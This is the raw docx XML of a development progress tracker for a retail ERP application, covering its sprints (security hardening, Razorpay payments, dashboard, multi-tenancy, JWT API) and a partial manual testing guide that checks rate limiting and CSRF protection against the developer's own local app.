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E3A5F"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>RetailERP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Development Progress Tracker</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Last Updated: March 06, 2026 — 08:54 AM</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Living Document — Regenerated after every sprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint Roadmap Overview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Sprint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Theme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Key Deliverables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Security Hardening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Rate limiting, CSRF fix, Serilog logging, health checks, secrets cleanup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COMPLETED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Razorpay UPI Payment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Razorpay REST API client, Checkout.js widget, payment verification, refunds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COMPLETED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Customizable Dashboard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Drag-and-drop widget-based dashboard, per-user layout, Gridstack.js, lock/unlock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COMPLETED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Multi-Tenant + Redis Cache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ITenantEntity, EF global query filters, SuperAdmin role, CacheService (Redis + fallback), Companies CRUD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COMPLETED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REST API + JWT Auth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Full REST API layer, JWT tokens, Swagger docs, mobile-ready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COMPLETED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Bill Template Designer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Visual bill/receipt designer, QuestPDF, thermal printer support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Expiry + Discount Engine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Batch expiry tracking, FIFO, BOGO, happy-hour, combo deals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GST Reports + E-Invoice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GSTR-1, GSTR-3B auto-generation, E-Invoice IRN, E-Way Bill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SignalR + Background Jobs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Real-time POS updates, Hangfire job processing, async email/sync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PWA Offline Mode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Service worker, IndexedDB, offline POS billing, auto-sync on reconnect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SMS / WhatsApp / Email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WhatsApp receipts, SMS alerts, promotional campaigns, templates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Barcode Printing + 2FA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Barcode/QR label printing, TOTP two-factor authentication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13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 Forecasting + Reorder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ML.NET sales prediction, auto-reorder suggestions, anomaly detection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Customer &amp; Supplier Portals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Self-service portals, purchase history, online returns, PO management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Franchise + Multi-Language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Franchise management, royalty calc, Hindi/Gujarati/Marathi i18n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Testing + CI/CD + DevOps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xUnit tests, GitHub Actions pipeline, Docker, deployment automation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🔲 NOT STARTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Detailed Progress Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Pre-Sprint: Foundation (Completed Before Roadmap)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All the work completed before the advanced roadmap was created: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Was Done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Benefit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1 – Foundation Tables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Stores, Units, Categories, Items with Barcode/MRP/GST, CRUD views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Core master data for all retail operations. Items support barcode scanning, MRP pricing, and GST tax calculation.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2 – Stock Transaction Ledger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StockTransaction entity with IN/OUT/ADJUSTMENT/TRANSFER/RETURN types, full audit trail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Complete inventory movement tracking. Every stock change is recorded with type, quantity, and user — enables accurate stock reconciliation.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3 – POS Billing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PosBill with real-time barcode scan, auto line add, status workflow (Open→Completed→Cancelled)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Fast retail checkout experience. Cashier scans barcodes, quantities auto-update, totals recalculate in real-time via AJAX.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4 – Payments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Multi-method payments (Cash/Card/UPI/Other), partial payments, payment tracking per bill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Flexible payment acceptance. Customers can split payment across methods. Remaining balance tracked until fully paid.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5 – Returns &amp; Refunds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Line-level returns, auto stock reversal, refund tracking linked to original bill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Professional returns handling. Stock automatically restored. Refund amounts tracked per payment method.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6 – Loyalty &amp; Coupons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Points system (1pt/₹100), 4-tier membership, percent/flat coupons with validation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Customer retention tools. Loyalty tiers (Bronze→Platinum) encourage repeat purchases. Coupons drive promotions.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7 – EOD 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Daily cash reconciliation per store, variance tracking, print-friendly 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Cash accountability. Manager see expected vs actual cash, flag discrepancies. Printable for daily filing.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8 – Offline Sync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Device-based sync queue, conflict resolution (Server/Client), status tracking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Foundation for offline POS. Changes queued locally and synced when online. Conflicts resolved automatically or manually.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 Upgrade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Combined Invoice + POS sales in KPIs, 3-line chart (Invoice/POS/Purchases), recent tables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Single source of truth. Manager sees ALL sales (invoice + POS) in one dashboard. No blind spots on revenue.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AJAX Binding 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POS AJAX endpoints use [FromBody] DTOs + [IgnoreAntiforgeryToken]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Fixed critical bug where POS operations failed silently. JSON payloads now correctly deserialized by ASP.NET Core.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Security Basics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Password hardening, lockout, active-user cookie check, basic security headers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Professional authentication defaults. Brute-force protection, inactive user auto-signout, XSS/clickjacking headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 1: Security Hardening (Completed)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Was Done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Benefit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Rate Limiting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Added ASP.NET Core 8 RateLimiter middleware. Fixed-window policies: Login (5 req/min), API (100 req/min), POS (60 req/min). Returns 429 Too Many Requests.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Prevents brute-force login attacks, API abuse, and DDoS. Essential for any production deployment.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CSRF Protection for AJAX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Replaced [IgnoreAntiforgeryToken] on all POS endpoints. Added antiforgery cookie-to-header flow. JS reads XSRF-TOKEN cookie and sends via X-XSRF-TOKEN header.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Closes critical CSRF vulnerability on all POS AJAX operations. Prevents cross-site request forgery attacks.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Serilog Structured Logging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Replaced default ILogger with Serilog. Console + File sinks (Logs/retailerp-.txt, daily rolling, 30-day retention). Enriched with: RequestId, UserId, MachineName.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Production-grade logging with structured data. Searchable logs for debugging. Daily rotation prevents disk fill.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Health Check Endpoint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Added /health endpoint. Checks: SQL Server connectivity, disk space. Returns Healthy/Degraded/Unhealthy JSON.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Load balancers and uptime monitors use this. Instantly know if DB is down or disk is full.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Content Security Policy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Added CSP header restricting scripts to 'self' + CDN sources. Blocks inline script injection.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Prevents XSS attacks by only allowing scripts from trusted sources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 2: Razorpay UPI Payment Integration (Completed)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Was Done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Benefit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RazorpayService (REST API Client)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Built custom HttpClient-based Razorpay REST API client (RazorpayService.cs, ~240 lines). Methods: CreateOrderAsync, VerifyPaymentSignature (HMAC-SHA256), FetchPaymentAsync, RefundAsync. Uses Basic Auth with KeyId:KeySecret. Replaces legacy NuGet SDK (incompatible with .NET 8).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.NET 8 native integration. No dependency on outdated .NET Framework NuGet package. Server-side signature verification prevents payment tampering.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RazorpayOptions Config Model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RazorpayOptions.cs — bound from appsettings.json + .NET User Secrets via IOptions&lt;T&gt; pattern. KeyId and KeySecret stored securely in User Secrets (never in source code).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Secure credential management. API keys never committed to Git. Easy to swap test/live keys.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PaymentGatewayController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New controller (~260 lines) with 3 endpoints: CreateOrder, VerifyPayment, Refund. CreateOrder calculates remaining bill amount and creates Razorpay order. VerifyPayment validates HMAC signature, fetches payment details (method/VPA/bank), records Payment entity. Refund endpoint (Admin/Manager only) processes full or partial refunds.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Complete server-side payment lifecycle. CSRF-protected AJAX endpoints. Role-based refund authorization.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Payment Entity — 7 New Fields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Added to Payment.cs: RazorpayOrderId, RazorpayPaymentId, RazorpaySignature, GatewayMethod (upi/card/netbanking/wallet), GatewayVpa, GatewayRefundId, IsGatewayPayment. Migration: Sprint2_Razorpay_Payment_Fields created and applied.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audit trail for every gateway payment. Track exact method (UPI VPA, card, netbanking). Refund status tracked per payment.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Razorpay Checkout.js Widget (POS Bill)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Added "Pay Online (UPI / Card / NetBanking)" button to POS Bill view. Flow: Click → AJAX CreateOrder → Razorpay Checkout popup opens → Customer pays → handler calls VerifyPayment → page reloads with payment recorded. Supports UPI, Card, NetBanking, Wallet methods.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One-click online payment from POS screen. Customer scans UPI QR or enters card details in Razorpay's PCI-compliant hosted form. No card data touches our server.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Receipt View — Gateway Badge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Updated Receipt.cshtml to show shield-check icon for verified gateway payments. Displays payment method (UPI/Card/NetBanking) and Razorpay Payment ID.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Clear visual distinction between cash and online payments on printed/digital receipts.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CSP Headers Updated for Razorpay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Updated Content-Security-Policy to allow Razorpay domains: checkout.razorpay.com (scripts/frames), api.razorpay.com (connect/frames), rzp.io + lumberjack.razorpay.com (images/analytics).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Razorpay Checkout loads correctly without CSP violations while maintaining security for all other sources.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 Registration + HttpClient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Registered RazorpayService via AddHttpClient&lt;RazorpayService&gt;() for proper HttpClient lifecycle management. Configured RazorpayOptions via builder.Configuration.GetSection("Razorpay").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HttpClient pooling via IHttpClientFactory prevents socket exhaustion. Clean DI pattern.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Antiforgery Cookie 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Fixed cookie name collision: removed Cookie.Name/HttpOnly/SameSite from AddAntiforgery() config. Framework cookie (.AspNetCore.Antiforgery.*) stays default. Middleware emits separate XSRF-TOKEN cookie for JS.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Fixed HTTP 400 on all POST requests caused by framework cookie being overwritten by middleware cookie with same name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 3: Customizable Widget Dashboard (Completed)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Was Done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Benefit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BusinessType Enum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BusinessType.cs enum with 9 types: Other, Kirana, Supermarket, Hardware, Pharmacy, Fashion, Restaurant, ChainStore, Franchise. Added BusinessType field to Store entity.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Each store can declare its business type. Dashboard default layouts auto-adapt to industry — e.g. Pharmacy gets Expiring Items widget, Restaurant gets POS Hourly chart.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UserDashboardLayout Entity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New entity (UserId, LayoutJson, LastModifiedUtc) with unique index on UserId. Cascade delete when user is removed. JSON stores array of {widgetId, x, y, w, h, visible}.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Each user gets their own saved dashboard layout. Layouts persist across sessions and devices.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DashboardWidgetCatalog (25 Widgets)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Static catalog with 25 widget definitions: 15 KPI cards, 5 charts, 5 tables. Each widget specifies: id, title, icon, type, default size, compatible business types, compatible roles. Default layout generator picks top widgets per business type + role.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Business-specific dashboards out of the box. Admin sees financial widgets, Cashier sees POS widgets, Inventory sees stock widgets. Kirana store defaults differ from Supermarket.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DashboardService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Scoped service with layout CRUD (GetLayout, SaveLayout, ResetLayout) and GetWidgetDataAsync switch expression covering all 25 widgets. Chart helpers: SalesPurchasesChart, PosHourlyChart, CategoryPie, PaymentMethodPie, TopItemsBar.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Clean separation of concerns. Each widget's data query is isolated and testable. Layout defaults auto-generated from catalog when user has no saved layout.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HomeController Widget API Endpoints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 new endpoints: GetLayout (GET — returns layout + catalog), SaveLayout (POST — persists JSON), ResetLayout (POST — deletes custom layout), WidgetData (GET — returns data for one widget). Dashboard() simplified to return empty view; all data loaded via AJAX.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Fast initial page load — only shell HTML is rendered server-side. Widgets load in parallel via AJAX. Individual widgets can refresh independently.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Gridstack.js v10 Integration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12-column responsive grid via CDN. dashboard.js (~350 lines): grid init, widget rendering (KPI/Chart/Table), auto-save after 1.5s debounce, widget picker sidebar with slide-in animation, per-widget refresh &amp; remove buttons.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Professional drag-and-drop dashboard. Users rearrange widgets freely. Resize from corners. Changes auto-saved — no Save button needed.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Widget Picker Sidebar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Slide-in panel listing all available widgets for user's role + business type. Shows widget icon, title, type, and default size. Already-active widgets highlighted. Click to add → widget appears at top of grid → auto-save triggers.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Easy widget discovery. Users see all available widgets at a glance and add with one click.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Lock / Unlock Mode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button in toolbar. Locked (default): grid.enableMove(false), grid.enableResize(false), remove buttons hidden, add/reset buttons hidden. Unlocked: full editing enabled. Visual feedback: locked = red lock icon, unlocked = dark outline unlock icon.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Prevents accidental drag/resize during daily use. Users unlock only when customizing. Clean read-only view by default.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Chart.js Widget Renderers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 chart types: Sales vs Purchases (line, 3 datasets), POS Hourly (bar), Category Sales (doughnut), Payment Methods (pie), Top 10 Items (horizontal bar). Auto-destroy and re-create on refresh to prevent canvas reuse errors.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Rich visual analytics inside draggable widgets. Each chart loads its own data independently.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Table Widget Renderers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 table widgets: Low Stock Alerts, Recent Invoices, Recent POS Bills, Expiring Items (placeholder), EOD Summary. Auto-formatted headers, currency formatting (₹), status badges (Posted/Draft/Open/Completed/Closed).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Actionable data tables inside the dashboard. Status badges use same style as rest of app.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CSS &amp; Responsive Design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dashboard.css (~180 lines): widget card styling, KPI large-number display, chart container auto-sizing, table overflow scroll, widget picker slide-in, locked-state hiding, responsive breakpoints for mobile.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Professional look matching Bootstrap 5 theme. Mobile-friendly — picker goes full-width on small screens.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EF Migration + CSP Update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Migration Sprint3_Dashboard_Widgets: adds BusinessType column to Stores, creates UserDashboardLayouts table. CSP already allowed cdn.jsdelivr.net. Added @RenderSectionAsync('Styles') to _Layout.cshtml for per-page CSS.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Database schema updated cleanly. No manual SQL needed. Gridstack CSS loads without CSP violations.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4 — Multi-Tenant Architecture + Redis Cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sprint 4 adds full multi-tenant isolation so each company sees only its own data, a SuperAdmin role that can see all tenants, and Redis distributed caching with an automatic in-memory fallback when Redis is unavailable.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Was Done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Benefit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ITenantEntity Interface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Data/Entities/ITenantEntity.cs with Guid? CompanyId property. Applied to all 20 business entities (Category, Coupon, Customer, EodReport, Invoice, Item, LoyaltyCard, LoyaltyTransaction, Payment, PosBill, PosReturn, Purchase, Stock, StockMovement, StockTransaction, Store, Supplier, SyncLog, Unit, Warehouse).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Single interface marks every tenant-scoped entity. Easy to add new entities later.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ApplicationUser.CompanyId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Added Guid? CompanyId to ApplicationUser (Identity). Links each user to a tenant company. SuperAdmin has CompanyId = null.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Users belong to exactly one tenant. Null means platform administrator.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Company Entity Enhancement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Extended Company with Address, Phone, Email, GstNo, PanNo, IsActive, CreatedAtUtc, UpdatedAtUtc. Company is the root tenant identifier.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company profile for multi-tenant management.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TenantProvider Service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Services/TenantProvider.cs implementing ITenantProvider. Reads CompanyId from ClaimsPrincipal ("CompanyId" claim). IsSuperAdmin checks IsInRole("SuperAdmin").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Single source of truth for current tenant context. Works with DI and EF Core.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EF Global Query Filters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ApplicationDbContext.ApplyTenantFilters() dynamically builds expression trees for every ITenantEntity: _tenant == null || _tenant.IsSuperAdmin || entity.CompanyId == _tenant.CompanyId. Called at end of OnModelCreating.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Automatic per-tenant row filtering. No manual WHERE clauses needed in controllers. SuperAdmin bypasses filters to see all data.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Auto-Stamp CompanyId on Save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Overrode SaveChanges/SaveChangesAsync with StampTenantOnNewEntities(). Sets CompanyId on all Added ITenantEntity entries from current tenant context.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New records automatically get correct CompanyId. Developers cannot forget to set it.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TenantClaimsPrincipalFactory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Services/TenantClaimsPrincipalFactory.cs extending UserClaimsPrincipalFactory. Adds CompanyId claim to cookie on login.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CompanyId travels in the auth cookie — no DB lookup on every request.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CacheService (Redis + Fallback)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Services/CacheService.cs wrapping IDistributedCache. Tenant-scoped keys (t:{companyId}:{key}). GetOrSetAsync&lt;T&gt; cache-aside pattern, RemoveAsync, RemoveByPrefixAsync. Program.cs tries ConnectionMultiplexer.Connect with 3s timeout, falls back to AddDistributedMemoryCache().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Tenant-isolated caching prevents cross-tenant data leaks. Redis optional — works out of the box with in-memory.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CompaniesController + Views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Controllers/CompaniesController.cs [Authorize(Roles="SuperAdmin")]. Full CRUD: Index (search/filter/sort/paginate), Details (user+store counts via IgnoreQueryFilters), Create, Edit. Four views: Index.cshtml, Create.cshtml, Edit.cshtml, Details.cshtml.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SuperAdmin can manage all tenant companies from the UI.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SuperAdmin Sidebar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Added "Platform" section in _Layout.cshtml visible only to SuperAdmin role. Links: Companies → CompaniesController, All Users → AdminUsersController.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Platform-level navigation separated from tenant-level navigation.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DbSeeder — SuperAdmin + Default Company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Seeds SuperAdmin role, Default Company (ID 00000000-0000-0000-0000-000000000001), retailerp.global@gmail.com as SuperAdmin (CompanyId=null). All demo users get DefaultCompanyId. BackfillCompanyIdAsync() updates 20 tables + AspNetUsers where CompanyId IS NULL.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Existing data automatically assigned to Default Company. SuperAdmin sees all tenants.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Migration + NuGet Packages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Migration Sprint4_MultiTenant_Redis created and applied. Added NuGet: Microsoft.Extensions.Caching.StackExchangeRedis 10.0.3, StackExchange.Redis 2.11.8. Redis connection string in appsettings.json.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Clean schema update. Redis packages ready for production use.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5 — REST API + JWT Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sprint 5 adds a complete REST API layer alongside the existing MVC views. JWT Bearer authentication enables mobile and third-party integration. Swagger UI provides interactive API documentation at /swagger.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Was Done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Benefit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NuGet Packages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Installed Microsoft.AspNetCore.Authentication.JwtBearer 8.0.12 and Swashbuckle.AspNetCore 6.9.0.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Industry-standard JWT validation and OpenAPI/Swagger documentation.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JwtTokenService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Services/JwtTokenService.cs (~80 lines). GenerateAccessToken() builds JWT with sub, email, displayName, companyId, and role claims signed with HMAC-SHA256. GenerateRefreshToken() creates 64-byte cryptographic random base64 token. GetPrincipalFromExpiredToken() validates JWT ignoring lifetime.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Centralised token logic. Access tokens carry all tenant/role info so API calls need zero DB lookups for authorisation. Refresh tokens enable seamless re-authentication.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JWT + Swagger in Program.cs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Added JWT Bearer authentication scheme after Identity cookie config. TokenValidationParameters validate issuer, audience, signing key, lifetime (1-min clock skew). JwtOptions singleton + JwtTokenService registered in DI. AddSwaggerGen() with Bearer security definition. Swagger UI at /swagger (dev only).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Dual auth: Cookie (MVC views) + JWT Bearer (REST API) run side-by-side. Swagger lets developers test every endpoint interactively with JWT auth.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DTOs &amp; Response Models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Models/Api/ApiResponse.cs — generic ApiResponse&lt;T&gt; envelope with Ok()/Fail() statics, PagedResponse&lt;T&gt; with page/pageSize/totalCount/totalPages. Created Models/Api/AuthDtos.cs — LoginRequest, TokenResponse, RefreshRequest, UserProfileResponse. Created Models/Api/EntityDtos.cs — DTOs for Item, Category, Unit, Store, Customer, Supplier, Warehouse, Stock, PosBill, PosBillLine, SalesReport, DailySales + Create/Update DTOs with validation attributes.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Clean API contract. Consistent envelope pattern for all responses. DTOs prevent over-posting and decouple API shape from EF entities.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RefreshToken Entity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Data/Entities/RefreshToken.cs (RefreshTokenId, UserId, Token, ExpiresAtUtc, CreatedAtUtc, IsRevoked). Added DbSet&lt;RefreshToken&gt; to ApplicationDbContext. Migration Sprint5_JWT_RefreshTokens applied.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Secure refresh token storage. Supports token rotation (old token revoked when new one issued) and bulk revocation on logout.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ApiBaseController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Controllers/Api/ApiBaseController.cs — abstract, [ApiController], [Route("api/v1/[controller]")], JWT auth scheme, helpers GetCompanyId() and GetUserId() from claims.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API controllers inherit consistent routing, auth, and tenant resolution. v1 prefix enables future API versioning.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Auth API Controller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Controllers/Api/AuthController.cs with 4 endpoints: POST /api/v1/auth/login (credentials → JWT + refresh token, checks IsActive + lockout), POST /api/v1/auth/refresh (rotate expired access + refresh tokens), GET /api/v1/auth/me (user profile from JWT claims), POST /api/v1/auth/logout (revoke all user refresh tokens).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Complete auth lifecycle. Login validates against Identity, generates tenant-scoped JWT. Refresh rotation prevents token reuse. Logout revokes all sessions.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Items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CRUD + search (name/SKU/barcode), filter (active, categoryId), pagination. GET /api/v1/items/low-stock — items where total stock ≤ reorderLevel.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Mobile/third-party apps can manage full item catalog. Low-stock endpoint enables push notifications.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Categories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CRUD + search by name + pagination. Returns parent category name in DTO.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Category management with hierarchical display support.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Units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CRUD + pagination.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Unit-of-measure management for items.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Stores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CRUD + search (name/code/city), active filter, pagination.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Multi-store management with location-based filtering.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Customers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CRUD + search (name/phone/email) + pagination.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Customer data access for loyalty apps, CRM integrations.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Suppliers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CRUD + search (name/phone), active filter, pagination.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Supplier management for purchase order workflows.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Warehouses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CRUD + search (name/address), filter by storeId, pagination. Returns store name in DTO.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Warehouse management with store association.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 Bills API (Read-Only)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GET /api/v1/pos/bills — list with search (billNo), filter (status/store/date range), pagination. GET /api/v1/pos/bills/{id} — single bill with line items (snapshot prices).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Read-only bill access for reporting, mobile receipt lookup. POS operations stay in MVC controller.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Stocks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GET /api/v1/stocks — stock levels with search (item name/SKU), filter by warehouseId. POST /api/v1/stocks/adjust — stock adjustment with automatic StockMovement recording.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Real-time inventory visibility. Adjustments create audit trail via StockMovement entity.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Reports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GET /api/v1/reports/sales — daily sales totals for date range (defaults to 30 days). Returns TotalBills, TotalRevenue, TotalTax, TotalDiscount, and daily breakdown. Filter by storeId.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Sales analytics accessible via API. Enables mobile dashboards and BI tool integrations.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EF Migration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Migration Sprint5_JWT_RefreshTokens created and applied. Adds RefreshTokens table.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Clean schema update. RefreshToken table supports token rotation and revocation.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1 — Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use this section to manually verify every Sprint 1 feature before moving to Sprint 2. Run the app with: dotnet run   (from C:\7th_Semester\RetailERP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Rate Limiting (Login / POS / API)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm the app returns HTTP 429 (Too Many Requests) when limits are exceeded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 1-A: Login Rate Limit (5 requests / minute)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Open browser → https://localhost:{port}/Identity/Account/Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Enter a WRONG password and click Login — repeat this 6 times quickly (within 60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. On the 6th attempt you should see a blank page or a '429 Too Many Requests' browser error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Wait 60 seconds, then try again — login should work normally now.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if 6th attempt is blocked  |  ❌ FAIL if all attempts go through</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 1-B: POS Rate Limit (60 requests / minute)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in as Admin or Cashier → go to POS → open (or create) a bill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Open browser DevTools → Console tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Paste this script and press Enter:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   for(let i=0;i&lt;65;i++){fetch("/Pos/AddLine",{method:"POST",headers:{"Content-Type":"application/json","X-XSRF-TOKEN":document.cookie.match(/XSRF-TOKEN=([^;]+)/)?.[1]||""},body:JSON.stringify({billId:"00000000-0000-0000-0000-000000000000",itemId:"00000000-0000-0000-0000-000000000000",qty:1})}).then(r=&gt;console.log(i,r.status))}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. You should see status 200 for the first ~60 requests, then 429 for the rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if you see 429 responses  |  ❌ FAIL if all return 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 1-C: Quick PowerShell Rate-Limit Test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   Run this in PowerShell (replace PORT with your actual port number):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1..8 | ForEach-Object { (Invoke-WebRequest -Uri "https://localhost:PORT/Identity/Account/Login" -Method GET -SkipCertificateCheck).StatusCode }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   First 5 should return 200, then 429.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. CSRF Protection for AJAX (Cookie-to-Header)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm POS AJAX calls include X-XSRF-TOKEN header and work correctly; calls WITHOUT the header should fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-A: Normal POS Flow Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Log in → POS → Create New Bill (pick any store/warehouse).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Scan or type a barcode/SKU → item should be added to the bill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Change quantity, add payment, apply coupon — all should work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Complete the bill → should redirect to receipt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if all POS operations work normally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-B: CSRF Token is Present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. While on the POS Bill page, open DevTools → Application → Cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Look for a cookie named "XSRF-TOKEN" — it should be present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Go to DevTools → Network tab → perform any POS action (add item, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Click the POST request → Headers tab → look for "X-XSRF-TOKEN" in Request Headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if both cookie and header are present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 2-C: Request Without Token Fails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Open DevTools → Console on the POS Bill page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Paste: fetch("/Pos/AddLine",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({billId:"test",itemId:"test",qty:1})}).then(r=&gt;console.log(r.status))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. This request deliberately omits X-XSRF-TOKEN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. You should see status 400 (Bad Request) — the server rejects it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if status is 400  |  ❌ FAIL if status is 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Serilog Structured Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm logs appear in both console and file with structured format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-A: Console Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Run the app: dotnet run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Look at the terminal/console output — you should see lines like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3.    [14:32:05 INF] HTTP GET /Home/Dashboard responded 200 in 45ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. Navigate around the app — every page load should generate a log line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if you see structured log lines with timestamps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3-B: File Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. After running the app and browsing a few pages, stop the app (Ctrl+C).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Open File Explorer → navigate to C:\7th_Semester\RetailERP\Logs\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
